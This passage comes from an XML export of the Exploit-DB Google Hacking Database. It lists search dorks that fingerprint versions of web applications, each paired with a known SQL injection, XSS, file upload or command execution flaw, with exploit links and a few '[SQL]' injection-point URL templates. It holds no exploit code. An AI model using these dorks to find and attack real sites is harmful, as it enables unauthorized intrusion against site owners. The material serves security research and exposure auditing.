# Date: 2/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Powered by Piwigo&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by Piwigo&quot;</querystring>
<edb></edb>
<date>2020-10-02</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3465</id>
<link>https://www.exploit-db.com/ghdb/3465</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by Plogger!&quot; -plogger.org</shortDescription>
<textualDescription>Plogger Beta 2.1 Administrative Credentials Disclosure: https://www.exploit-db.com/exploits/1621</textualDescription>
<query>intext:&quot;Powered by Plogger!&quot; -plogger.org</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+by+Plogger!%22+-plogger.org</querystring>
<edb>https://www.exploit-db.com/exploits/1621</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1314</id>
<link>https://www.exploit-db.com/ghdb/1314</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by Plogger!&quot; -plogger.org -ihackstuff -exploit</shortDescription>
<textualDescription>explaination &amp; exploit: http://retrogod.altervista.org/plogger_b21_sql_xpl.html</textualDescription>
<query>intext:&quot;Powered by Plogger!&quot; -plogger.org -ihackstuff -exploit</query>
<querystring>https://www.google.com/search?q=intext%3A%22Powered+by+Plogger%21%22+-plogger.org+-ihackstuff+-exploit&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-03-28</date>
<author>anonymous</author>
</entry>
<entry>
<id>3410</id>
<link>https://www.exploit-db.com/ghdb/3410</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by pppblog&quot;</shortDescription>
<textualDescription>pppBlog 0.3.8 (randompic.php) System Disclosure - CVE: 2006-2770: https://www.exploit-db.com/exploits/1853</textualDescription>
<query>intext:&quot;Powered by pppblog&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+by+pppblog%22</querystring>
<edb>https://www.exploit-db.com/exploits/1853</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2884</id>
<link>https://www.exploit-db.com/ghdb/2884</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by Ramaas Software&quot;</shortDescription>
<textualDescription>Ramaas Software CMS SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12412</textualDescription>
<query>intext:&quot;Powered by Ramaas Software&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22Powered+by+Ramaas+Software%22</querystring>
<edb>https://www.exploit-db.com/exploits/12412</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1219</id>
<link>https://www.exploit-db.com/ghdb/1219</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by SimpleBBS v1.1&quot;*</shortDescription>
<textualDescription>Vulnerability DescriptionSimpleBBS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search module not properly sanitizing user-supplied input to undisclosed variables. This may allow an attacker to inject or manipulate SQL queries in the backend database. No further details have been provided.Solution DescriptionCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.Products:* SimpleMedia SimpleBBS 1.1 AffectedVulnerability classification:* Remote vulnerability* Input manipulation attack* Impact on integrity* Exploit unavailable* VerifiedMore info on Vuln: http://www.securityfocus.com/bid/15594</textualDescription>
<query>intext:&quot;Powered by SimpleBBS v1.1&quot;*</query>
<querystring>https://www.google.com/search?q=intext%3A%22Powered+by+SimpleBBS+v1.1%22*&amp;num=100</querystring>
<edb></edb>
<date>2005-12-14</date>
<author>anonymous</author>
</entry>
<entry>
<id>3481</id>
<link>https://www.exploit-db.com/ghdb/3481</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by simplog&quot;</shortDescription>
<textualDescription>Simplog 0.9.2 (s) Remote Commands Execution - CVE: 2006-0146: https://www.exploit-db.com/exploits/1663</textualDescription>
<query>intext:&quot;Powered by simplog&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered+by+simplog&quot;</querystring>
<edb>https://www.exploit-db.com/exploits/1663</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2585</id>
<link>https://www.exploit-db.com/ghdb/2585</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by the 1-2-3 music store&quot;</shortDescription>
<textualDescription>Easybe 1-2-3 Music Store (process.php) Remote SQL Injection Vuln - CVE: 2007-3520: https://www.exploit-db.com/exploits/4134</textualDescription>
<query>intext:&quot;Powered by the 1-2-3 music store&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+by+the+1-2-3+music+store%22</querystring>
<edb>https://www.exploit-db.com/exploits/4134</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1722</id>
<link>https://www.exploit-db.com/ghdb/1722</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;powered by tincan ltd&quot;</shortDescription>
<textualDescription>tincan ltd (section) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/11113</textualDescription>
<query>intext:&quot;powered by tincan ltd&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22powered+by+tincan+ltd%22</querystring>
<edb>https://www.exploit-db.com/exploits/11113</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6589</id>
<link>https://www.exploit-db.com/ghdb/6589</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by Typesetter&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Powered by Typesetter&quot;
# Typesetter CMS 5.1 - 'Site Title' Persistent Cross-Site Scripting.
https://www.exploit-db.com/exploits/48852
# Date: 2/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Powered by Typesetter&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by Typesetter&quot;</querystring>
<edb></edb>
<date>2020-10-02</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>8070</id>
<link>https://www.exploit-db.com/ghdb/8070</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by Virtual Airlines Manager [v2.6.2]&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Powered by Virtual Airlines Manager [v2.6.2]&quot;
# Advisories and Vulnerabilities
# Date:21/02/2023
# Exploit Author: Milad karimi</textualDescription>
<query># Google Dork: intext:&quot;Powered by Virtual Airlines Manager [v2.6.2]&quot;</query>
<querystring>https://www.google.com/search?q=# Google Dork: intext:&quot;Powered by Virtual Airlines Manager [v2.6.2]&quot;</querystring>
<edb></edb>
<date>2023-02-21</date>
<author>Milad karimi</author>
</entry>
<entry>
<id>3701</id>
<link>https://www.exploit-db.com/ghdb/3701</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by VoiceCMS&quot;</shortDescription>
<textualDescription>Submitter: p0pc0rn SQL Injection: http://site.com/default.asp?com=[Page]&amp;id=[SQL]&amp;m=[id] http://site.com/default.asp?com=[Page]&amp;id=[id]&amp;m=[SQL]</textualDescription>
<query>intext:&quot;Powered by VoiceCMS&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22Powered+by+VoiceCMS%22</querystring>
<edb></edb>
<date>2011-03-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>2803</id>
<link>https://www.exploit-db.com/ghdb/2803</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered By WorldPay&quot; inurl:productdetail.php</shortDescription>
<textualDescription>WorldPay Script Shop (productdetail) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/10976</textualDescription>
<query>intext:&quot;Powered By WorldPay&quot; inurl:productdetail.php</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+By+WorldPay%22+inurl:productdetail.php</querystring>
<edb>https://www.exploit-db.com/exploits/10976</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2388</id>
<link>https://www.exploit-db.com/ghdb/2388</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by WSN Links Basic Edition&quot;</shortDescription>
<textualDescription>WSN Links Basic Edition (displaycat catid) SQL Injection Vulnerbility - CVE: 2007-3981: https://www.exploit-db.com/exploits/4209</textualDescription>
<query>intext:&quot;Powered by WSN Links Basic Edition&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+by+WSN+Links+Basic+Edition%22</querystring>
<edb>https://www.exploit-db.com/exploits/4209</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5902</id>
<link>https://www.exploit-db.com/ghdb/5902</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by YouPHPTube&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Powered by YouPHPTube&quot;
# By using this dork, sites vulnerable to YouPHPTube </textualDescription>
<query>intext:&quot;Powered by YouPHPTube&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Powered by YouPHPTube&quot;</querystring>
<edb></edb>
<date>2020-04-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>1021</id>
<link>https://www.exploit-db.com/ghdb/1021</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered By: Snitz Forums 2000 Version 3.4.00..03&quot;</shortDescription>
<textualDescription>snitz Forum 2000 v 3.4.03 and older is vulnerable to many things including XSS. See http://www.gulftech.org/?node=research&amp;article_id=00012-06162003. This is a sketchy search, finding vulnerable versions 3.4.00-3.4.03. Older versions are vulnerable as well.</textualDescription>
<query>intext:&quot;Powered By: Snitz Forums 2000 Version 3.4.00..03&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=intext%3A%22Powered+By%3A+Snitz+Forums+2000+Version+3.4.00..03%22</querystring>
<edb></edb>
<date>2005-06-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>3111</id>
<link>https://www.exploit-db.com/ghdb/3111</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Powered by: Virtual War v1.5.0&quot;</shortDescription>
<textualDescription>VWar 1.50 R14 (online.php) Remote SQL Injection Vulnerability - CVE: 2006-4142: https://www.exploit-db.com/exploits/2170</textualDescription>
<query>intext:&quot;Powered by: Virtual War v1.5.0&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Powered+by:+Virtual+War+v1.5.0%22</querystring>
<edb>https://www.exploit-db.com/exploits/2170</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6602</id>
<link>https://www.exploit-db.com/ghdb/6602</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Published with Textpattern CMS&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;Published with Textpattern CMS&quot;
# Textpattern CMS 4.6.2 - 'body' Persistent Cross-Site Scripting.
https://www.exploit-db.com/exploits/48861
# Date: 9/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;Published with Textpattern CMS&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;Published with Textpattern CMS&quot;</querystring>
<edb></edb>
<date>2020-10-09</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>2919</id>
<link>https://www.exploit-db.com/ghdb/2919</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Remository 3.25. is technology by Black Sheep Research&quot;</shortDescription>
<textualDescription>Mambo Remository Component 3.25 Remote Include Vulnerability - CVE: 2006-4130: https://www.exploit-db.com/exploits/2172</textualDescription>
<query>intext:&quot;Remository 3.25. is technology by Black Sheep Research&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22Remository+3.25.+is+technology+by+Black+Sheep+Research%22</querystring>
<edb>https://www.exploit-db.com/exploits/2172</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2480</id>
<link>https://www.exploit-db.com/ghdb/2480</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;RPG Inferno is not available to guests&quot; or intext:&quot;Battle Ground · Clans · Store · Jobs · Auction · Spells Shop · Statistics · Member List&quot;</shortDescription>
<textualDescription>vBulletin Mod RPG Inferno 2.4 (inferno.php) SQL Injection Vulnerability - CVE: 2007-3687: https://www.exploit-db.com/exploits/4166</textualDescription>
<query>intext:&quot;RPG Inferno is not available to guests&quot; or intext:&quot;Battle Ground · Clans · Store · Jobs · Auction · Spells Shop · Statistics · Member List&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22RPG+Inferno+is+not+available+to+guests%22+or+intext:%22Battle+Ground+%C3%82%C2%B7+Clans+%C3%82%C2%B7+Store+%C3%82%C2%B7+Jobs+%C3%82%C2%B7+Auction+%C3%82%C2%B7+Spells+Shop+%C3%82%C2%B7+Statistic</querystring>
<edb>https://www.exploit-db.com/exploits/4166</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3700</id>
<link>https://www.exploit-db.com/ghdb/3700</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Site by Triware Technologies Inc&quot;</shortDescription>
<textualDescription>Submitter: p0pc0rn
SQL Injection: http://site.com/default.asp?com=[Page]&amp;id=[SQL]&amp;m=[id] http://site.com/default.asp?com=[Page]&amp;id=[id]&amp;m=[SQL]</textualDescription>
<query>intext:&quot;Site by Triware Technologies Inc&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22Site+by+Triware+Technologies+Inc%22</querystring>
<edb></edb>
<date>2011-03-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>2108</id>
<link>https://www.exploit-db.com/ghdb/2108</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;sitio web diseñado por www.toronja.com.pe&quot;</shortDescription>
<textualDescription>Toronja Cms HTML/XSS Injection Vulnerability: https://www.exploit-db.com/exploits/12771</textualDescription>
<query>intext:&quot;sitio web diseñado por www.toronja.com.pe&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22sitio+web+dise%C3%B1ado+por+www.toronja.com.pe%22</querystring>
<edb>https://www.exploit-db.com/exploits/12771</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3531</id>
<link>https://www.exploit-db.com/ghdb/3531</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;This site is using phpGraphy&quot; | intitle:&quot;my phpgraphy site&quot;</shortDescription>
<textualDescription>PHPGraphy 0.9.12 Privilege Escalation / Commands Execution: https://www.exploit-db.com/exploits/2867</textualDescription>
<query>intext:&quot;This site is using phpGraphy&quot; | intitle:&quot;my phpgraphy site&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22This+site+is+using+phpGraphy%22+|+intitle:%22my+phpgraphy+site%22</querystring>
<edb>https://www.exploit-db.com/exploits/2867</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1369</id>
<link>https://www.exploit-db.com/ghdb/1369</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;This site is using phpGraphy&quot; | intitle:&quot;my phpgraphy site&quot;</shortDescription>
<textualDescription>found this: a remote user can have access to some edit functionalities to &quot;modify&quot; html. Impact: cross site scripting, denial of service references:http://retrogod.altervista.org/phpgraphy_0911_adv.htmlhttp://secunia.com/advisories/19705</textualDescription>
<query>intext:&quot;This site is using phpGraphy&quot; | intitle:&quot;my phpgraphy site&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22This+site+is+using+phpGraphy%22+%7C+intitle%3A%22my+phpgraphy+site%22+&amp;btnG=Cerca+con+Google&amp;meta=&amp;num=100&amp;filter=1</querystring>
<edb></edb>
<date>2006-05-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>6309</id>
<link>https://www.exploit-db.com/ghdb/6309</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;TopManage (R) 2002 - 2020&quot;</shortDescription>
<textualDescription># Google Dork: intext:&quot;TopManage ® 2002 - 2020&quot;
# OLK Web Store 2020 - Cross-Site Request Forgery. This dork is linked to
# the following existing exploit: https://www.exploit-db.com/exploits/47960
# Date: 05/06/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:&quot;TopManage (R) 2002 - 2020&quot;</query>
<querystring>https://www.google.com/search?q=intext:&quot;TopManage (R) 2002 - 2020&quot;</querystring>
<edb></edb>
<date>2020-06-18</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>2145</id>
<link>https://www.exploit-db.com/ghdb/2145</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Web design by goffgrafix.com&quot;</shortDescription>
<textualDescription>goffgrafix Design's SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12712</textualDescription>
<query>intext:&quot;Web design by goffgrafix.com&quot;</query>
<querystring>https://www.google.com/search?q=intext:%22Web+design+by+goffgrafix.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/12712</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3694</id>
<link>https://www.exploit-db.com/ghdb/3694</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;Web Design by Webz&quot; filetype:asp</shortDescription>
<textualDescription>Submitter: p0pc0rn
http://site.com/xxx.asp?id=[SQL]
http://site.com/xxx.asp?catID=[SQL]
http://site.com/xxx.asp?brandID=[SQL]</textualDescription>
<query>intext:&quot;Web Design by Webz&quot; filetype:asp</query>
<querystring>https://www.google.com/search?q=%22Web+Design+by+Webz%22+filetype:asp</querystring>
<edb></edb>
<date>2011-03-08</date>
<author>anonymous</author>
</entry>
<entry>
<id>2948</id>
<link>https://www.exploit-db.com/ghdb/2948</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:&quot;© Tainos Webdesign&quot;</shortDescription>
<textualDescription>Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability: https://www.exploit-db.com/exploits/12631</textualDescription>
<query>intext:&quot;© Tainos Webdesign&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%22%C2%A9+Tainos+Webdesign%22</querystring>
<edb>https://www.exploit-db.com/exploits/12631</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2096</id>
<link>https://www.exploit-db.com/ghdb/2096</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:'Powered by ProArcadeScript ' inurl:'game.php?id='</shortDescription>
<textualDescription>ProArcadeScript to Game (game) SQL Injection Vulnerability - CVE: 2010-1069: https://www.exploit-db.com/exploits/11080</textualDescription>
<query>intext:'Powered by ProArcadeScript ' inurl:'game.php?id='</query>
<querystring>https://www.google.com/search?q=intext:'Powered+by+ProArcadeScript+'+inurl:'game.php%3Fid%3D'</querystring>
<edb>https://www.exploit-db.com/exploits/11080</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>688</id>
<link>https://www.exploit-db.com/ghdb/688</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:(&quot;UBB.threadsâââ¬Å¾Ã¢ 6.2&quot;|&quot;UBB.threadsâââ¬Å¾Ã¢ 6.3&quot;) intext:&quot;You * not logged *&quot; -site:ubbcentral.com</shortDescription>
<textualDescription>UBB.Threads 6.2.*-6.3.* one char bruteforce vulnerability:http://www.k-otik.com/exploits/20041116.r57ubb.pl.php</textualDescription>
<query>intext:(&quot;UBB.threadsâââ¬Å¾Ã¢ 6.2&quot;|&quot;UBB.threadsâââ¬Å¾Ã¢ 6.3&quot;) intext:&quot;You * not logged *&quot; -site:ubbcentral.com</query>
<querystring>https://www.google.com/search?num=100&amp;q=intext%3A%28%22UBB.threads%E2%84%A2+6.2%22%7C%22UBB.threads%E2%84%A2+6.3%22%29+intext%3A%22You+*+not+logged+*%22+-site%3Aubbcentral.com</querystring>
<edb></edb>
<date>2004-11-18</date>
<author>anonymous</author>
</entry>
<entry>
<id>1507</id>
<link>https://www.exploit-db.com/ghdb/1507</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:©2003-2008 RC v3.1 Developed by: GA Soft</shortDescription>
<textualDescription>Rapid Classified 3.1 (cldb.mdb) Database Disclosure Vulnerability - CVE: 2008-6388: https://www.exploit-db.com/exploits/7324</textualDescription>
<query>intext:©2003-2008 RC v3.1 Developed by: GA Soft</query>
<querystring>https://www.google.com/search?q=intext:%C3%82%C2%A92003-2008+RC+v3.1+Developed+by:+GA+Soft</querystring>
<edb>https://www.exploit-db.com/exploits/7324</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6320</id>
<link>https://www.exploit-db.com/ghdb/6320</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:Basato su Comunicazioni Integrate IceWarp</shortDescription>
<textualDescription>[*] Google Dork:- intext:Basato su Comunicazioni Integrate IceWarp
[*] IceWarp WebMail 11.4.4.1 and older version - Reflective Cross-Site
Scripting.
[*]This dork is linked to the following existing exploit:
https://www.exploit-db.com/exploits/47988
[*] CVE: CVE-2020-8512
[*] Date: 17/06/2020
[*] Author: Sagar Yadav
</textualDescription>
<query>intext:Basato su Comunicazioni Integrate IceWarp</query>
<querystring>https://www.google.com/search?q=intext:Basato su Comunicazioni Integrate IceWarp</querystring>
<edb></edb>
<date>2020-06-22</date>
<author>Sagar Yadav</author>
</entry>
<entry>
<id>6312</id>
<link>https://www.exploit-db.com/ghdb/6312</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:Basato su IceWarp Server</shortDescription>
<textualDescription># Dork: intext:Basato su IceWarp Server
# IceWarp WebMail 11.4.4.1 and older version - Reflective Cross-Site
Scripting.
# This dork is linked to the following existing exploit:
# https://www.exploit-db.com/exploits/47988
[*] CVE: CVE-2020-8512
[*] Date: 17/06/2020
[*] Author: Sagar Yadav
</textualDescription>
<query>intext:Basato su IceWarp Server</query>
<querystring>https://www.google.com/search?q=intext:Basato su IceWarp Server</querystring>
<edb></edb>
<date>2020-06-22</date>
<author>Sagar Yadav</author>
</entry>
<entry>
<id>1837</id>
<link>https://www.exploit-db.com/ghdb/1837</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:Design by: runt communications</shortDescription>
<textualDescription>runt-communications Design SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12707</textualDescription>
<query>intext:Design by: runt communications</query>
<querystring>https://www.google.com/search?q=intext:Design+by:+runt+communications</querystring>
<edb>https://www.exploit-db.com/exploits/12707</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3143</id>
<link>https://www.exploit-db.com/ghdb/3143</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:elkagroup Image Gallery v1.0</shortDescription>
<textualDescription>elkagroup Image Gallery 1.0 Remote SQL Injection Vulnerability - CVE: 2007-3461: https://www.exploit-db.com/exploits/4114</textualDescription>
<query>intext:elkagroup Image Gallery v1.0</query>
<querystring>https://www.google.com/search?q=intext:elkagroup++Image+Gallery+v1.0</querystring>
<edb>https://www.exploit-db.com/exploits/4114</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1818</id>
<link>https://www.exploit-db.com/ghdb/1818</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:PHPhotoalbum v0.5</shortDescription>
<textualDescription>PHPhotoalbum 0.5 Multiple Remote SQL Injection Vulnerabilities - CVE: 2008-2501: https://www.exploit-db.com/exploits/5683</textualDescription>
<query>intext:PHPhotoalbum v0.5</query>
<querystring>https://www.google.com/search?q=intext:PHPhotoalbum+v0.5</querystring>
<edb>https://www.exploit-db.com/exploits/5683</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6359</id>
<link>https://www.exploit-db.com/ghdb/6359</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:piwik &quot;Sign in&quot;</shortDescription>
<textualDescription># Dork: intext:piwik &quot;Sign in&quot;
# PIWIK LOGIN PAGES
# Author : Pierguido Iezzi
</textualDescription>
<query>intext:piwik &quot;Sign in&quot;</query>
<querystring>https://www.google.com/search?q=intext:piwik &quot;Sign in&quot;</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Pierguido Iezzi</author>
</entry>
<entry>
<id>6333</id>
<link>https://www.exploit-db.com/ghdb/6333</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:Powered by 2Moons 2009-2013</shortDescription>
<textualDescription># Google Dork: intext:Powered by 2Moons 2009-2013
# 2Moons - Multiple Vulnerabilities
# This dork is linked to the following existing exploit:
# https://www.exploit-db.com/exploits/37713
[*] Date: 26/06/2020
[*] Twitter Handle: VanshalG
[*] Author: Vanshal Gaur
</textualDescription>
<query>intext:Powered by 2Moons 2009-2013</query>
<querystring>https://www.google.com/search?q=intext:Powered by 2Moons 2009-2013</querystring>
<edb></edb>
<date>2020-06-26</date>
<author>Vanshal Gaur</author>
</entry>
<entry>
<id>2707</id>
<link>https://www.exploit-db.com/ghdb/2707</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:Powered by AWCM v2.1</shortDescription>
<textualDescription>AWCM 2.1 Local File Inclusion / Auth Bypass Vulnerabilities - CVE: 2009-3219: https://www.exploit-db.com/exploits/9237</textualDescription>
<query>intext:Powered by AWCM v2.1</query>
<querystring>https://www.google.com/search?q=intext:Powered+by+AWCM+v2.1</querystring>
<edb>https://www.exploit-db.com/exploits/9237</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2458</id>
<link>https://www.exploit-db.com/ghdb/2458</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:Powered by CPA Site Solutions</shortDescription>
<textualDescription>CPA Site Solutions Remote File Upload Vulnerability: https://www.exploit-db.com/exploits/11365</textualDescription>
<query>intext:Powered by CPA Site Solutions</query>
<querystring>https://www.google.com/search?q=intext:Powered+by+CPA+Site+Solutions</querystring>
<edb>https://www.exploit-db.com/exploits/11365</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2563</id>
<link>https://www.exploit-db.com/ghdb/2563</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:Powered by Infront</shortDescription>
<textualDescription>Infront SQL Injection Vulnerability: https://www.exploit-db.com/exploits/13848</textualDescription>
<query>intext:Powered by Infront</query>
<querystring>https://www.google.com/search?q=intext:Powered+by+Infront</querystring>
<edb>https://www.exploit-db.com/exploits/13848</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>6294</id>
<link>https://www.exploit-db.com/ghdb/6294</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:powered by JoomSport - sport WordPress plugin</shortDescription>
<textualDescription># Google Dork: intext:powered by JoomSport - sport WordPress plugin
# JoomSport 3.3 for Sports - SQL injection. This dork is linked to the
# following existing exploit (CVE : 2019-14348) :
# https://www.exploit-db.com/exploits/47210
# Date: 2020-06-10
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>intext:powered by JoomSport - sport WordPress plugin</query>
<querystring>https://www.google.com/search?q=intext:powered by JoomSport - sport WordPress plugin</querystring>
<edb></edb>
<date>2020-06-16</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>3251</id>
<link>https://www.exploit-db.com/ghdb/3251</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:Powered by Mobilelib Gold v3</shortDescription>
<textualDescription>Mobilelib Gold v3 (Auth Bypass/SQL) Multiple Remote Vulnerabilities - CVE: 2009-2788: https://www.exploit-db.com/exploits/9327</textualDescription>
<query>intext:Powered by Mobilelib Gold v3</query>
<querystring>https://www.google.com/search?q=intext:Powered+by+Mobilelib+Gold+v3</querystring>
<edb>https://www.exploit-db.com/exploits/9327</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1904</id>
<link>https://www.exploit-db.com/ghdb/1904</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:Powered by MX-System 2.7.3</shortDescription>
<textualDescription>MX-System 2.7.3 (index.php page) Remote SQL Injection Vulnerability - CVE: 2008-2477: https://www.exploit-db.com/exploits/5659</textualDescription>
<query>intext:Powered by MX-System 2.7.3</query>
<querystring>https://www.google.com/search?q=intext:Powered+by+MX-System+2.7.3</querystring>
<edb>https://www.exploit-db.com/exploits/5659</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2566</id>
<link>https://www.exploit-db.com/ghdb/2566</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:Powered by SaphpLesson 4.0</shortDescription>
<textualDescription>SaphpLesson v4.0 (Auth Bypass) SQL Injection Vulnerability - CVE: 2009-2883: https://www.exploit-db.com/exploits/9248</textualDescription>
<query>intext:Powered by SaphpLesson 4.0</query>
<querystring>https://www.google.com/search?q=intext:Powered+by+SaphpLesson+4.0</querystring>
<edb>https://www.exploit-db.com/exploits/9248</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>5557</id>
<link>https://www.exploit-db.com/ghdb/5557</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intext:Powered By vBulletin 5.5.4 inurl:forum.</shortDescription>
<textualDescription>Category: Advisories and Vulnerabilities
Author: IdeaEngine007
</textualDescription>
<query>intext:Powered By vBulletin 5.5.4 inurl:forum.</query>
<querystring>https://www.google.com/search?q=intext:Powered By vBulletin 5.5.4 inurl:forum.</querystring>
<edb></edb>
<date>2019-09-26</date>
<author>IdeaEngine007</author>
</entry>
<entry>
<id>2297</id>
<link>https://www.exploit-db.com/ghdb/2297</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>intitle: phpBazar-AdminPanel</shortDescription>
